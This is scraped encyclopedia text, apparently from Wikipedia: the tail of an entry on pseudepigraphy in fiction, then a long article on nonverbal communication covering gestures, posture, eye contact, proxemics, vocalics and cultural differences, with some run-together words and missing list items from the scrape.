Pseudepigraphy has been employed as ametafictionaltechnique. Authors who have made notable use of this device includeJames Hogg(The Private Memoirs and Confessions of a Justified Sinner),Thomas Carlyle(Sartor Resartus),Jorge Luis Borges("An Examination of the Works of Herbert Quain"; "Pierre Menard, Author of the Quixote"),Vladimir Nabokov(Pale Fire),Stanislaw Lem(A Perfect Vacuum;Imaginary Magnitude)Roberto Bolaño(Nazi Literature in the Americas) andStefan Heym(The Lenz Papers).
Edgar Rice Burroughsalso presented many of his works – including the most well-known, theTarzanbooks – as pseudepigrapha, prefacing each book with a detailed introduction presenting the supposed actual author, with Burroughs himself pretending to be no more than the literary editor.J.R.R. TolkieninThe Lord of the Ringspresents that story andThe Hobbitas translated from the fictionalRed Book of Westmarchwritten by characters within the novels. The twelve books ofThe Flashman Papersseries byGeorge MacDonald Frasersimilarly pretend to be transcriptions of the papers left by an "illustriousVictoriansoldier", each volume prefaced by a long semi-scholarly Explanatory Note stating that "additional packets of Flashman's papers have been found and are here presented to the public". A similar device was used byIan FleminginThe Spy Who Loved Meand by various other writers of popular fiction.
|
https://en.wikipedia.org/wiki/Pseudepigrapha
|
Nonverbal communicationis the transmission of messages or signals through a nonverbal platform such aseye contact(oculesics),body language(kinesics),social distance(proxemics), touch (haptics), voice (prosodyandparalanguage), physical environments/appearance, and use of objects. When communicating, nonverbal channels are utilized as means to convey different messages or signals, whereas others interpret these messages.[1]The study of nonverbal communication started in 1872 with the publication ofThe Expression of the Emotions in Man and AnimalsbyCharles Darwin. Darwin began to study nonverbalcommunicationas he noticed the interactions between animals such as lions, tigers, dogs etc. and realized they also communicated by gestures and expressions.[2]For the first time, nonverbal communication was studied and its relevance noted. Today, scholars argue that nonverbal communication can convey more meaning than verbal communication.[3]
In the same way that speech incorporates nonverbal components, collectively referred to as paralanguage and encompassingvoice quality, rate, pitch, loudness, and speaking style, nonverbal communication also encompasses facets of one's voice. Elements such as tone, inflection, emphasis, and other vocal characteristics contribute significantly to nonverbal communication, adding layers of meaning and nuance to the conveyed message.[4]However, much of the study of nonverbal communication has focused on interaction between individuals,[5]where it can be classified into three principal areas:environmentalconditions where communication takes place, physical characteristics of the communicators, and behaviors of communicators during interaction.
Nonverbal communication involves the conscious and unconscious processes of encoding and decoding. Encoding is defined as our ability to express emotions in a way that can be accurately interpreted by the receiver(s). Decoding is called "nonverbal sensitivity", defined as the ability to take this encoded emotion and interpret its meanings accurately to what the sender intended. Encoding is the act of generating information such as facial expressions, gestures, and postures. Encoding information utilizes signals which we may think to be universal. Decoding is the interpretation of information from received sensations given by the encoder.Cultureplays an important role in nonverbal communication, and it is one aspect that helps to influence how we interact with each other. In manyIndigenous Americancommunities, nonverbal cues and silence hold immense importance in deciphering the meaning of messages. In such cultures, the context, relationship dynamics, and subtle nonverbal cues play a pivotal role in communication and interpretation, impacting how learning activities are organized and understood.
According to some authors, nonverbal communication representstwo-thirds of all communications[clarify].[6][7][8]Nonverbal communication can portray a message both vocally and with the correct body signals orgestures. Body signals comprisephysical features, conscious andunconsciousgestures and signals, and the mediation ofpersonal space.[6]The wrong message can also be established if the body language conveyed does not match a verbal message. Paying attention to both verbal and nonverbal communication may leave the listener with a feeling of being lost, due to not being able to breakdown both at the same time. However, ignoring nonverbal communication altogether would cause the listener to miss up to 60% of their communication, according to experts.
Nonverbal communication strengthens a firstimpressionin common situations like attracting a partner or in a business interview: impressions are on average formed within the first four seconds of contact.[6]First encounters or interactions with another person strongly affect a person's perception.[9]When the other person or group is absorbing the message, they are focused on the entireenvironmentaround them, meaning the other person uses all five senses in the interaction: 83% sight, 11% hearing, 3% smell, 2% touch and 1% taste.[10]
Many indigenous cultures use nonverbal communication in theintegrationof children at a young age into their cultural practices. Children in these communities learn through observing and pitching in through which nonverbal communication is a key aspect of observation.
According to Judee K. Burgoon et al., further reasons for the importance of non-verbal communication are:
Nonverbal communication encompasses a diverse range of signals that go beyond spoken language, such as gestures, facial expressions, body language, and vocal nuances like tone and rhythm. These cues carry subtle meanings critical to effective communication. For example, facial expressions are a powerful medium for conveying emotions, sometimes even through subtlemicroexpressions. These microexpressions are fleeting, involuntary facial movements that briefly reveal genuine feeling. They often occur in a fraction of a second, offering a brief insight into a person's genuine emotions, some of which may not be intentionally expressed and may diverge from their consciously stated feelings.[14]While some cues might be universally understood, others hold culture-specific significance, necessitating careful interpretation to prevent misunderstandings. Understanding the tone, pitch, cultural connotations of touch, and environmental influences enriches nonverbal communication, shaping our interactions. Recognizing that cultural norms influence the appropriateness of tone and pitch is crucial, as outlined by display rules. This underscores the significance of being culturally sensitive when interpreting nonverbal cues. In the context of intercultural communication, a deeper understanding of context culture becomes essential. Context culture significantly shapes how individuals communicate emotions and convey meaning through nonverbal signals. Being aware of these cultural nuances is fundamental for facilitating successful cross-cultural interactions and ensuring the accurate interpretation of nonverbal expressions.[15]
The understanding of tone, pitch, and cultural contexts in verbal communication complements nonverbal cues, offering a holistic grasp of interpersonal dynamics.[16]The harmony or discrepancy between verbal and nonverbal signals significantly impacts message clarity. In cultures where nonverbal cues are pivotal, incongruence between verbal and nonverbal elements can create confusion, while in cultures emphasizing explicit verbal communication, alignment between the two is essential for effective understanding.
Mastery of nonverbal signals extends beyond mere word comprehension, promoting cultural awareness and smoother interactions across diverse settings.[16]Proficiency in interpreting these cues not only aids in accurate understanding but also bolsters cross-cultural connections, enabling more profound exchanges. Adeptness in nonverbal communication is crucial for navigating social situations, decoding nuanced human behaviors, and establishing meaningful connections in various contexts, underlining the interconnectedness and importance of both verbal and nonverbal forms of communication.
Scientific research on nonverbal communication and behavior was started in 1872 with the publication ofCharles Darwin's book,The Expression of theEmotionsin Man and Animals.[10]In the book, Darwin argued that all mammals, both humans and animals, showed emotion through facial expressions. He posed questions such as: "Why do our facial expressions of emotions take the particular forms they do?" and "Why do we wrinkle our nose when we are disgusted and bare our teeth when we are enraged?"[17]Darwin attributed these facial expressions to serviceable associated habits, which are behaviors that earlier in our evolutionary history had specific and direct functions.[17]For example, a species that attacked by biting, baring the teeth was a necessary act before an assault and wrinkling the nose reduced the inhalation of foul odors. In response to the question asking why facial expressions persist even when they no longer serve their original purposes, Darwin's predecessors have developed a highly valued explanation. According to Darwin, humans continue to make facial expressions because they have acquired communicative value throughout evolutionary history.[17]In other words, humans utilize facial expressions as external evidence of their internal state. AlthoughThe Expression of the Emotions in Man and Animalswas not one of Darwin's most successful books in terms of its quality and overall impact in the field, his initial ideas started the abundance of research on the types, effects, and expressions of nonverbal communication and behavior.[18]Charles Darwin was also a renowned British naturalist and biologist best known for developing the theory of evolution through natural selection[19]
Despite the introduction of nonverbal communication in the 1800s, the emergence of behaviorism in the 1920s paused further research on nonverbal communication.[18]Behaviorism is defined as the theory of learning that describes people's behavior as acquired through conditioning.[20]Behaviorists such as B.F. Skinner trained pigeons to engage in various behaviors to demonstrate how animals engage in behaviors with rewards.[20]
While mostpsychologyresearchers were exploring behaviorism, the study of nonverbal communication as recorded on film began in 1955–56 at the Center for Advanced Study inBehavioral Sciencesthrough a project which came to be called theNatural History of an Interview. The initial participants included two psychiatrists, Frieda Fromm-Reichman and Henry Brosin, two linguists, Norman A. McQuown andCharles Hockett, and also two anthropologists,Clyde KluckhohnandDavid M. Schneider(these last two withdrew by the end of 1955, and did not participate in the major group project). In their place, two other anthropologists,Ray Birdwhistell, already then known as the founder ofkinesics, the study of body motion communication,[21]andGregory Bateson, known more generally as a human communication theorist, both joined the team in 1956. Albert Scheflen andAdam Kendonwere among those who joined one of the small research teams continuing research once the year at CASBS ended. The project analyzed a film made by Bateson, using an analytic method called at the timenatural history, and later, mostly by Scheflen,context analysis. The result remained unpublished, as it was enormous and unwieldy, but it was available on microfilm by 1971.[22]The method involves transcribing filmed or videotaped behavior in excruciating detail, and was later used in studying the sequence and structure of human greetings, social behaviors at parties, and the function of posture during interpersonal interaction.[23][24][25][26]
Researchon nonverbal communication rocketed during the mid-1960s by a number of psychologists and researchers.Michael ArgyleandJanet Dean Fodor, for example, studied the relationship between eye contact and conversational distance. Ralph V. Exline examined patterns of looking while speaking and looking while listening.[18]Eckhard Hessproduced several studies pertaining to pupil dilation that were published inScientific American.Robert Sommerstudied the relationship between personal space and the environment.[18]Robert Rosenthaldiscovered that expectations made by teachers and researchers can influence their outcomes, and that subtle, nonverbal cues may play an important role in this process.[18]Albert Mehrabianstudied the nonverbal cues of liking and immediacy. By the 1970s, a number of scholarly volumes in psychology summarized the growing body of research, such as Shirley Weitz'sNonverbal Communicationand Marianne LaFrance andClara Mayo'sMoving Bodies.[18]Popular books includedBody Language(Fast, 1970), which focused on how to use nonverbal communication to attract other people, andHow to Read a Person Like a Book(Nierenberg& Calero, 1971) which examined nonverbal behavior in negotiation situations.[18]The journalEnvironmental Psychology and Nonverbal Behaviorwas founded in 1976.[27]
In 1970, Argyle hypothesized that although spoken language is used for communicating the meaning about events external to the person communicating, the nonverbal codes are used to create and strengtheninterpersonal relationships.[28]When someone wishes to avoid conflicting or embarrassing events during communication, it is considered proper and correct by the hypothesis to communicate attitudes towards others non-verbally instead of verbally.[29]Along with this philosophy, Michael Argyle also found and concluded in 1988 that there are five main functions of nonverbal body behavior and gestures in human communications: self-presentation of one's whole personality, rituals and cultural greetings, expressing interpersonal attitudes, expressing emotions, and to accompany speech in managing the cues set in the interactions between the speaker and the listener.[28]
It takes just one-tenth of a second for someone to judge and make their first impression. According to a study from Princeton University, this short amount of time is enough for a person to determine several attributes about an individual. These attributes included "attractiveness, likeability, trustworthiness, competence, and aggressiveness." A first impression is a lasting non-verbal communicator. The way a person portrays themselves on the first encounter is non-verbal statement to the observer. Presentation can include clothing and other visible attributes such as facial expressions or facial traits in general. Negative impressions can also be based on presentation and on personal prejudice. First impressions, although sometimes misleading, can in many situations be an accurate depiction of others.[30]
In terms of culture, collectivists have a harder time changing their first impressions because they emphasize a lot more context and need additional time when faced with new clues as each view may be correct in some contexts.[31]Moreover, Fang et al., acknowledged that first impression is less likely to change in Asian culture because they value cohesiveness and consensus, thus will not destroy their group cohesiveness at the expense of changing their first impression when they reached a consensus.
Posture is a nonverbal cue that is associated with positioning and that these two are used as sources of information about individual's characteristics, attitudes, and feelings about themselves and other people.[32]There are many different types of body positioning to portray certain postures, including slouching, towering, legs spread, jaw thrust, shoulders forward, and arm crossing. The posture or bodily stance exhibited by individuals communicates a variety of messages whether good or bad. A study, for instance, identified around 200 postures that are related to maladjustment and withholding of information.[32]
Posture can be used to determine a participant's degree of attention or involvement, the difference in status between communicators, and the level of fondness a person has for the other communicator, depending on body "openness".[33]: 9It can also be effectively used as a way for an individual to convey a desire to increase, limit, or avoid interaction with another person.[34]Studies investigating the impact of posture on interpersonal relationships suggest that mirror-image congruent postures, where one person's left side is parallel to the other person's right side, leads to favorable perception of communicators and positivespeech; a person who displays a forward lean or decreases a backward lean also signifies positive sentiment during communication.[35]
Posture can be situation-relative, that is, people will change their posture depending on the situation they are in.[36]This can be demonstrated in the case of relaxed posture when an individual is within a nonthreatening situation and the way one's body tightens or become rigid when under stress.[37]
Clothingis one of the most common forms of non-verbal communication. The study of clothing and other objects as a means of non-verbal communication is known asartifactics[38]orobjectics.[39]The types of clothing that an individual wears convey nonverbal cues about their personality, background and financial status, and how others will respond to them.[10]An individual's clothing style can demonstrate theirculture,mood, level of confidence, interests, age, authority, and values/beliefs.[40]For instance, Jewish men may wear ayarmulketo outwardly communicate their religious belief. Similarly, clothing can communicate what nationality a person or group is; for example, in traditional festivities Scottish men often wear kilts to specify their culture.
Aside from communicating a person's beliefs and nationality, clothing can be used as a nonverbal cue to attract others. Men and women may shower themselves with accessories and high-end fashion to attract partners interested. In this case, clothing is a form of self-expression where people can flaunt their power, wealth, sex appeal, or creativity.[40]A study of the clothing worn by women attending discothèques, carried out inVienna, Austria. It showed that in certain groups of women (especially women who were without their partners), motivation forsexand levels of sexualhormoneswere correlated with aspects of their clothing, especially the amount of skin displayed and the presence of sheer clothing.[41]
The way one chooses to dress tells a lot about one's personality. The University of North Carolina studied how undergraduate women chose to dress and their personality types. The study showed that women dressed "primarily for comfort and practicality were more self-controlled, dependable, and socially well adjusted."[42]Women who did not like to stand out in a crowd typically had more conservative and traditional views and beliefs. Clothing, although non-verbal, tells people what the individual's personality is. The way a person dresses is typically rooted in deeper internal motivations such as emotions, experiences, and culture.[43]Clothing expresses who they are or who they want to be that day. It shows other people who they want to be associated with and where they fit in. Clothing can start relationships because they clue other people into the wearer.[42][43]
When it comes to the clothing that they wear, nonverbal communication with gangs is very common. Gang members typically wear 2–3 colors to signify that they are representing a particular neighborhood. Baseball caps and hats with specific gang names and initials, worn backwards, tilted, in certain colors, etc. bandanas worn around the head, shoulders, arms, or legs. Gang members frequently dress in hip-hop-inspired fashions, such as oversized pants worn below the waist (also known as "sagging"). Colored belts, colored shoes, and colored bandanas are all utilized as identifiers. Group colors and clothing are commonly used to represent affiliation.
Gesturesmay be made with the hands, arms or body, and also include movements of the head, face and eyes, such aswinking,nodding, orrolling one's eyes. Although the study of gesture is still in its infancy, some broad categories of gestures have been identified by researchers. The most familiar are the so-called emblems or quotable gestures. These are conventional, culture-specific gestures that can be used as replacement for words, such as thehand waveused in western cultures for "hello" and "goodbye". A single emblematic gesture can have a very different significance in different cultural contexts, ranging from complimentary to highly offensive.[44]For a list of emblematic gestures, seeList of gestures. There are some universal gestures like theshoulder shrug.[10]
Gestures can also be categorized as either speech independent or speech related. Speech-independent gestures are dependent upon culturally accepted interpretation and have a direct verbaltranslation.[33]: 9A wave or apeace signare examples of speech-independent gestures. Speech-related gestures are used in parallel with verbal speech; this form of nonverbal communication is used to emphasize the message that is being communicated. Speech-related gestures are intended to provide supplemental information to a verbal message such as pointing to an object of discussion.
Gestures are not just for the audience but can also help a speakers elaborate their thoughts, process their ideas more fluently.[45]A simple example is giving someone a direction for a place you start pointing left and right to remind yourself of the right direction. That is not only help the listeners but also help you visualize the road as you were going through it.
Facial expressions, more than anything, serve as a practical means of communication. With all the various muscles that precisely control mouth, lips, eyes, nose, forehead, and jaw, human faces are estimated to be capable of more than ten thousand different expressions. This versatility makes non-verbals of the face extremely efficient and honest, unless deliberately manipulated. In addition, many of these emotions, including happiness, sadness, anger, fear, surprise, disgust, shame, anguish and interest are universallyrecognized.[46]
Displays of emotions can generally be categorized into two groups: negative and positive. Negative emotions usually manifest as increased tension in various muscle groups: tightening of jaw muscles, furrowing of forehead, squinting eyes, or lip occlusion (when the lips seemingly disappear). In contrast, positive emotions are revealed by the loosening of the furrowed lines on the forehead, relaxation of the muscles around the mouth, and widening of the eye area. When individuals are truly relaxed and at ease, the head will also tilt to the side, exposing our most vulnerable area, the neck. This is a high-comfort display, often seen during courtship, that is nearly impossible to mimic when tense or suspicious.[47]
Gestures can be subdivided into three groups:
Some hand movements are not considered to be gestures. They consist of manipulations either of the person or some object (e.g. clothing, pencils, eyeglasses)—the kinds of scratching, fidgeting, rubbing, tapping, and touching that people often do with their hands. These behaviors can show that a person is experiencing anxiety or feeling of discomfort, typical when the individual is not the one in control of the conversation or situation and therefore expresses this uneasiness subconsciously. Such behaviors are referred to as adapters. They may not be perceived as meaningfully related to the speech in which they accompany, but may serve as the basis for dispositional inferences of the speaker's emotion (nervous, uncomfortable, bored.) These types of movements are believed to express the unconscious thoughts and feelings of a person, or thosethoughtsand emotions one is trying to consciously hide.
Other hand movements are gestures. They are movements with specific, conventionalized meanings called symbolic gestures. They are the exact opposite of adaptors, since their meanings are intended to be communicated and they have a specific meaning for the person who gives the gesture and the person to receive it. Familiar symbolic gestures include the "raised fist," "bye-bye," and "thumbs up." In contrast to adapters, symbolic gestures are used intentionally and serve a clear communicative function.Sign languagesare highly developed systems of symbolic gesture. Some educators that work with deaf learners use a combination of cued speech and lip speaking and reading that helps deaf and hard hearing individuals (D/HH) to code and decode words based on their phonetics.[48]In addition to the supplementary aspect of the cues like location and movement, every culture has their own set of gestures, some of which are unique only to a specific culture. For example, the phonological and lexical repository of D/HH individuals is highly dependent on their social background and richness of language.[48]Very similar gestures can have very different meanings across cultures. Symbolic gestures are usually used in the absence of speech but can also accompany speech.
The middle ground between adapters and symbolic gestures is occupied by conversational gestures. These gestures do not refer to actions or words but do accompanyspeech. Conversational gestures are hand movements that accompany speech and are related to the speech they accompany. Though they do accompany speech,conversationalgestures are not seen in the absence of speech and are only made by the person who is speaking.
There are a few types of conversational gestures, specifically motor and lexical movements. Motor movements are those which are rhythmical and repetitive, do not have to be accompanied by anything spoken due to their simple meaning, and the speaker's hand usually sticks to one position. When paired with verbal communication, they can be used to stress certain syllables. An example of this would be pointing someone in the direction of an individual and saying, "That way." In this case, the "That" in the sentence would be stressed by the movements. Lexical movements are more complex, not rhythmic, or repetitive, but rather lengthy and varied. An example of this would be something like giving elaborate directions to somewhere and pairing that with various hands movements to signal the various turns to take.
According toEdward T. Hall, the amount of space we maintain between ourselves and the persons with whom we are communicating shows the importance of the science of proxemics. In this process, it is seen how we feel towards the others at that particular time.[49]Within American culture Hall defines four primary distance zones: (i) intimate (touching to eighteen inches [0–46 centimetres]) distance, (ii) personal (eighteen inches to four feet, [0.46–1.22 metres]) distance, (iii) social (four to twelve feet [1.22–3.66 metres]) distance, and (iv) public (more than twelve feet [3.66 metres]) distance. Intimate distance is considered appropriate for familiar relationships and indicates closeness and trust. Personal distance is still close but keeps another "at arm's length" and is considered the most comfortable distance for most of our interpersonal contact, while social distance is used for the kind of communication that occurs in business relationships and, sometimes, in the classroom. Public distance occurs in situations where two-way communication is not desirable or possible.[49]
Proxemics plays a crucial role in getting to know someone.[50]Imagine two individuals sitting at a small dinner table. One person, motivated by romantic interest, begins to lean in, lightly touching the other’s arm and shifting their chair closer. They are operating within the intimate zone, expecting closeness. However, the other person, who does not share the same romantic feelings, perceives this behavior as a breach of social norms. They expected the interaction to remain within personal distance, a more appropriate zone for acquaintances or casual dates. As a result, they may respond by pulling away, crossing their arms, or showing visible discomfort signals of a desire to re-establish that personal boundary.
In addition, to social expectations, cultural can play a role in proxemics. People from different cultures have different comfort zones when it comes to personal space (Chen & Starosta, 2005)[51].In everyday conversations, people from places like North Africa, and parts of the Middle East usually feel fine standing closer to others. On the other hand, people from Japan and China often prefer more space between themselves and others. Not understanding these differences can make cross-cultural interactions feel awkward or uncomfortable.[52]For example, someone from a culture that’s used to standing close might keep moving forward if the other person keep stepping back. Meanwhile, someone who’s used to more space might feel uneasy or confused if someone stands too close.
Eye contactis the instance when two people look at each other's eyes at the same time; it is the primary nonverbal way of indicating engagement, interest, attention and involvement. Nonverbal communication involves the conscious and unconscious processes ofencodinganddecoding. Encoding is defined as our ability to express emotions in a way that the receiver(s). Decoding is called "nonverbal sensitivity", defined as the ability to take this encoded emotion and interpret its meanings accurately to what the sender intended. Encoding is the act of generating information such as facial expressions, gestures, and postures. Some studies have demonstrated that people use their eyes to indicate interest. This includes frequently recognized actions ofwinkingand movements of the eyebrows.[53]Disinterest is highly noticeable when little or no eye contact is made in a social setting. When an individual is interested, however, the pupils will dilate.
According to Eckman, "Eye contact (also called mutual gaze) is another major channel of nonverbal communication. The duration of eye contact is its most meaningful aspect."[54]Generally speaking, the longer there is established eye contact between two people, the greater theintimacylevels.[6]Gaze comprises the actions of looking while talking and listening. The length of a gaze, the frequency of glances, patterns of fixation, pupildilation, and blink rate are all important cues in nonverbal communication.[55]According to Descroix et al., the context of conversations does not produce long blinks between the emitter and the recipient. "Liking generally increases as mutual gazing increases."[6]
Along with the detection of disinterest,deceitcan also be observed in a person. Hogan states "when someone is being deceptive their eyes tend to blink a lot more. Eyes act as leading indicator of truth or deception,"[6]Both nonverbal and verbal cues are useful when detecting deception. It is typical for people who are detecting lies to rely consistently on verbal cues but this can hinder how well they detect deception. Those who are lying and those who are telling the truth possess different forms of nonverbal and verbal cues and this is important to keep in mind. In addition, it is important to note that understanding the cultural background of a person will influence how easily deception is detectable because nonverbal cues may differ depending on the culture. In addition to eye contact these nonverbal cues can consist of physiological aspects including pulse rate as well as levels of perspiration.[20]In addition eye aversion can be predictive of deception. Eye aversion is the avoidance of eye contact. Eye contact and facial expressions provide important social and emotional information. Overall, as Pease states, "Give the amount of eye contact that makes everyone feel comfortable. Unless looking at others is a cultural no-no, lookers gain more credibility than non-lookers"[10]
In concealingdeception, nonverbal communication makes it easier to lie without being revealed. This is the conclusion of a study where people watched made-up interviews of persons accused of having stolen a wallet. The interviewees lied in about 50% of the cases. People had access to either writtentranscriptof the interviews, or audio tape recordings, or video recordings. The more clues that were available to those watching, the larger was the trend that interviewees who actually lied were judged to be truthful. That is, people that are clever at lying can use tone of voice and facial expressions to give the impression that they are truthful.[56]Contrary to popular belief, a liar does not always avoid eye contact. In an attempt to be more convincing, liars deliberately made more eye contact with interviewers than those that were telling the truth.[57][58]However, there are many cited examples of cues to deceit, delivered via nonverbal (paraverbal and visual) communication channels, through which deceivers supposedly unwittingly provide clues to their concealed knowledge or actual opinions.[59]Most studies examining the nonverbal cues to deceit rely upon human coding of video footage (c.f. Vrij, 2008[60]), although a recent study also demonstrated bodily movement differences between truth-tellers and liars using an automated bodymotion capturesystem.[61]
Olfactic communicationis a channel of nonverbal communication referring to the various ways people and animalscommunicateand engage insocial interactionthrough their sense ofsmell. Ourhumanolfactorysenseis one of the mostphylogeneticallyprimitive[62]andemotionallyintimate[63]of thefive senses; the sensation of smell is thought to be the most matured and developed human sense.
Nonverbal communication stands in contrast to communication through words, but includes other aspects of the speech signal. In particular,prosody, and in particularvocalics, plays a very important part in nonverbal communication. Prosodic properties such as tempo, volume, inflection, pauses, and pitch can combine to communicate emotion and attitude without using specific words. Vocalics also includes emblems, or sounds with specific meanings, like saying “brrr” when you are cold or “hmm” when you are thinking about something.[66]These are not specific words, but noises that further convey a person’s message. These sounds are often accompanied by other nonverbal cues.
Infants heavily rely on nonverbal vocalics to communicate their needs. As caregivers talk with their baby, the baby can pick up intonation as well start to mimic and use it themselves.[66]As they go on, babies can pick up more and learn how to develop their own voices and vocalics.
Furthermore, in a study highlighted by Pearce and Conklin, they found that changing the vocalics of an audio recording of the same speech gave different results of liking. When the speaker gave his speech as more conversational instead of dynamic, he was deemed more trust worthy.[67]
Vocalics can heavily influence communication through its many different cues.
While not traditionally thought of as "talk," nonverbal communication has been found to contain highly precise and symbolic meanings, similar to verbal speech. However the meanings in nonverbal communication are conveyed through the use of gesture, posture changes, and timing.[68]Nuances across different aspects of nonverbal communication can be found in cultures all around the world. These differences can often lead to miscommunication between people of different cultures, who usually do not mean to offend. Differences can be based in preferences for mode of communication, like the Chinese, who prefer silence over verbal communication.[69]: 69Differences can even be based on how cultures perceive the passage of time. Chronemics, how people handle time, can be categorized in two ways: polychronic which is when people do many activities at once and is common in Italy and Spain, or monochronic which is when people do one thing at a time which is common in America.[70]: 422Because nonverbal communication can vary across many axes—gestures, gaze, clothing, posture, direction, or even environmental cues like lighting—there is a lot of room for cultural differences.[71]: 8In Japan, a country which prides itself on the best customer service, workers tend to use wide arm gestures to give clear directions to strangers—accompanied by the ever-present bow to indicate respect. One of the main factors that differentiates nonverbal communication in cultures ishigh and low-context. Context relates to certain events and the meaning that is ultimately derived from it.[72]"High-context" cultures rely mostly on nonverbal cues and gestures, using elements such as the closeness of the kind of the relationships they have with others, strict social hierarchies and classes and deep cultural tradition and widely known beliefs and rules. In contrast, "low-context" cultures depend largely on words and verbal communication, where communications are direct and social hierarchies are way less tense and more loose.
Gestures vary widely across cultures in how they are used and what they mean. A common example is pointing. In the United States, pointing is the gesture of a finger or hand to indicate or "come here please" when beckoning a dog. But pointing with one finger is also considered to be rude by some cultures. Those from Asian cultures typically use their entire hand to point to something.[73]Other examples include, sticking your tongue out. In Western countries, it can be seen as mockery, but in Polynesia it serves as a greeting and a sign of reverence.[70]: 417Clapping is a North American way of applauding, but in Spain is used to summon a waiter at a restaurant. Differences in nodding and shaking the head to indicate agreement and disagreement also exist. Northern Europeans nodding their heads up and down to say "yes", and shaking their head from side to side to say "no". But the Greeks have for at least three thousand years used the upward nod for disagreement and the downward nod for agreement."[70]: 417There are many ways of waving goodbye: Americans face the palm outward and move the hand side to side, Italians face the palm inward and move the fingers facing the other person, French and Germans face the hand horizontal and move the fingers toward the person leaving.[70]: 417Also, it is important to note that gestures are used in more informal settings and more often by children.[70]: 417People in the United States commonly use the "OK" hand gesture[72]to give permission and allow an action. In Japan, however, the same sign means "money". It refers to "zero" or "nothing" in several cultures besides these two (Argentina, Belgium, French and the Portuguese). To Eastern European cultures that same "OK" sign is considered a vulgar swearing gesture. In certain Commonwealth cultures, the index and middle fingers only extended with the palm pointing outwards can be an insulting gesture, while in others it simply means the number "two" or the "V for Victory" sign, while the same sign with the palm pointing inwards means "peace" in some cultures.
Speech-independent gestures are nonverbal cues that communicate a word or an expression, most commonly adictionarydefinition.[74]Although there is differences in nonverbal gestures across cultures, speech-independent gestures must have an agreeable understanding among people affiliated with that culture or subculture on what that gesture's interpretation is.[74]As most humans use gestures to better clarify their speech, speech-independent gestures do not rely on speech for their meaning. Usually they transpire into a single gesture.[74]
Many speech-independent gestures are made with the hand, the "ring" gesture usually comes across as asking someone if they are okay.[74]There are several that could be performed through the face. For example, a nose wrinkle could universally mean disapproval or disgust.[74]Nodding your head up and down or side to side indicate an understanding or lack of when the speaker is talking. Just because speech-independent speech does not need actual speech for understanding the gesture, it still needs context.[74]Using your middle finger is a gesture that could be used within differentcontexts. It could be comical or derogatory. The only way to know is if one analyzes the other behaviors surrounding it and depending on who the speaker is and who the speaker is addressing.[74]
Emotionsare a key factor in nonverbal communication. Just as gestures and other hand movements vary across cultures, so does the way people display their emotions. For example, "In many cultures, such as the Arab and Iranian cultures, people express grief openly. They mourn out loud, while in Asian cultures, the general belief is that it is unacceptable to show emotion openly."[75]For people in Westernized countries, laughter is a sign of amusement, but in some parts of Africa it is a sign of wonder or embarrassment.[70]: 417Emotional expression varies with culture.[76]Native Americans tend to be more reserved and less expressive with emotions.[77]: 44Frequent touches are common for Chinese people; however, such actions like touching, patting, hugging or kissing in America are less frequent and not often publicly displayed.[69]: 68According to Rebecca Bernstein (fromPoint Park University) "Winking is a facial expression particularly varied in meaning."According to Latin culture, a wink was a display or invitation of romantic pursuit. The Yoruba (Nigeria) have taught their children to follow certain nonverbal commands, such as winking, which tells them it is time to leave the room. To the Chinese it comes off as an offensive gesture.[72]
According to Matsumoto and Juang, the nonverbal motions of different people indicate important channels of communication. Nonverbal actions should match and harmonize with the message being portrayed, otherwise confusion will occur.[18]For instance, an individual would normally not be seen smiling and gesturing broadly when saying a sad message. The author states that nonverbal communication is very important to be aware of, especially if comparing gestures, gaze, and tone of voice amongst different cultures. As Latin American cultures embrace big speech gestures, Middle Eastern cultures are relatively more modest in public and are not expressive. Within cultures, different rules are made about staring or gazing. Women may especially avoid eye contact with men because it can be taken as a sign of sexual interest.[73]In some cultures, gaze can be seen as a sign of respect. In Western culture, eye contact is interpreted as attentiveness and honesty. In Hispanic, Asian, Middle Eastern, and Native American cultures, eye contact is thought to be disrespectful or rude, and lack of eye contact does not mean that a person is not paying attention. Voice is a category that changes within cultures. Depending on whether or not the cultures is expressive or non-expressive, many variants of the voice can depict different reactions.[78]
The acceptable physical distance is another major difference in the nonverbal communication between cultures. InLatin Americaand theMiddle Eastthe acceptable distance is much shorter than what most Europeans and Americans feel comfortable with. This is why an American or a European might wonder why the other person is invading their personal space by standing so close, while the other person might wonder why the American/European is standing so far from them.[79]In addition, for Latin Americans, the French, Italians, and Arabs the distance between people is much closer than the distance for Americans; in general for these close distance groups, 1 foot of distance is for lovers, 1.5–4 feet of distance is for family and friends, and 4–12 feet is for strangers.[70]: 421In the opposite way, most Native Americans value distance to protect themselves.[77]: 43
Nonverbal communication is commonly used to facilitate learning in indigenous American communities. Nonverbal communication is pivotal for collaborative participation in shared activities, as children from indigenous American communities will learn how to interact using nonverbal communication by intently observing adults.[68]Nonverbal communication allows for continuous keen observation and signals to the learner when participation is needed. Culture plays an important role in nonverbal communication, and it is one aspect that helps to influence how learning activities are organized. In many Indigenous American Communities, for example, there is often an emphasis on nonverbal communication, which acts as a valued means by which children learn.[80]In a study on Children from both US Mexican (with presumed indigenous backgrounds) and European American heritages who watched a video of children working together without speaking found that the Mexican-heritage children were far more likely to describe the children's actions as collaborative, saying that the children in the video were "talking with their hands and with their eyes."[81]
A key characteristic of this type of nonverbal learning is that children have the opportunity to observe and interact with all parts of an activity.[82]Many Indigenous American children are in close contact with adults and other children who are performing the activities that they will eventually master. Objects and materials become familiar to the child as the activities are a normal part of everyday life. Learning is done in an extremely contextualized environment rather than one specifically tailored to be instructional.[82]For example, the direct involvement that Mazahua children take in the marketplace is used as a type of interactional organization for learning without explicit verbal instruction. Children learn how to run a market stall, take part in caregiving, and also learn other basic responsibilities through non-structured activities, cooperating voluntarily within a motivational context to participate. Not explicitly instructing or guiding the children teaches them how to integrate into small coordinated groups to solve a problem through consensus and shared space.[82]These Mazahua separate-but-together practices have shown that participation in everyday interaction and later learning activities establishes enculturation that is rooted in nonverbal social experience.[82]As the children participate in everyday interactions, they are simultaneously learning the cultural meanings behind these interactions. Children's experience with nonverbally organized social interaction helps constitute the process ofenculturation.[82]
In some Indigenous communities of the Americas, children reported one of their main reasons for working in their home was to build unity within the family, the same way they desire to build solidarity within their own communities.[83]Most indigenous children learn the importance of putting in this work in the form of nonverbal communication. Evidence of this can be observed in a case study where children are guided through the task of folding a paper figure by observing the posture and gaze of those who guide them through it.[84]This is projected onto homes and communities, as children wait for certain cues from others to initiative cooperate and collaborate.
